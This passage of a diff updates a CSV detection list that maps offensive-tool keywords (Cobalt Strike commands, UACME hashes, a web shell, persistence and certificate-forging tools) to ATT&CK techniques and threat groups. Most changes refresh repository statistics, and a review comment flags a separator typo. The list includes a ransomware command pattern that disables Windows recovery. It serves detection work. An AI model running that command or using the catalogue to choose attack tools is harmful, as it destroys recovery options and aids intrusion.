Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*bawait_upload*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bawait_upload_raw*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bb3b1a1f-0447-42a6-955a-88681fb88499*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" -"*bbcd54496dca975abf6089526023446984238d464e2df7485230b76072ff2ea1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*bbce2e4fa4cbb392974e7276108f1f9091f31e806a2c81964c996953e0770125*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows 
AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*bbcd54496dca975abf6089526023446984238d464e2df7485230b76072ff2ea1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*bbce2e4fa4cbb392974e7276108f1f9091f31e806a2c81964c996953e0770125*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*bblockdlls*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bbrowserpivot*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bbrowserpivot*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
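Review bot: The re-added `*BasicServiceExploit.class*` row (metasploit) still carries a malformed separator in its `metadata_tool_techniques` field: `T1204 -T1210` lacks the space after the dash that every other entry uses. The commit only refreshes the star, fork and updated-at columns, so the defect is carried over unchanged from the removed row. Any consumer that splits this field on ` - ` to build ATT&CK mappings would presumably get the single token `T1204 -T1210` and miss both techniques in coverage reports. I would correct it in the same change to `T1204 - T1210`, and ideally add a CI check that every token in the techniques and tactics columns matches the expected ID pattern.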
@@ -7592,8 +7738,8 @@ "*bcc2_setenv*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bcc2_spawn*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bcdedit.exe /set {default} recoveryenabled No*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*BCHASH-Rijndael-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*BCHASH-Rijndael-256.unverified.test-vectors.txt*","offensive_tool_keyword","john","John 
the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*BCHASH-Rijndael-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*BCHASH-Rijndael-256.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*bcrossc2_load_dyn*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*BC-SECURITY*","offensive_tool_keyword","Github Username","Cybersecurity Engineers and Offensive Security enthusiasts actively maintaining/updating Powershell Empire in our spare time.","T1021 - T1024 - T1027 - T1059 - T1074 - T1053","TA0008 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BC-SECURITY*Malleable*","offensive_tool_keyword","cobaltstrike","Malleable C2 Profiles. A collection of profiles used in different projects using Cobalt Strike & Empire.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" 
@@ -7601,10 +7747,10 @@ "*BC-SECURITY/Starkiller*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" "*bd346689-8ee6-40b3-858b-4ed94f08d40a*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*BD602C80-47ED-4294-B981-0119D2200DB8*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and 
original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" -"*bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*bdamele/icmpsh*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*bdcsync*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bdllinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" 
@@ -7613,7 +7759,7 @@ "*bdllload*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bdllspawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bdllspawn*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 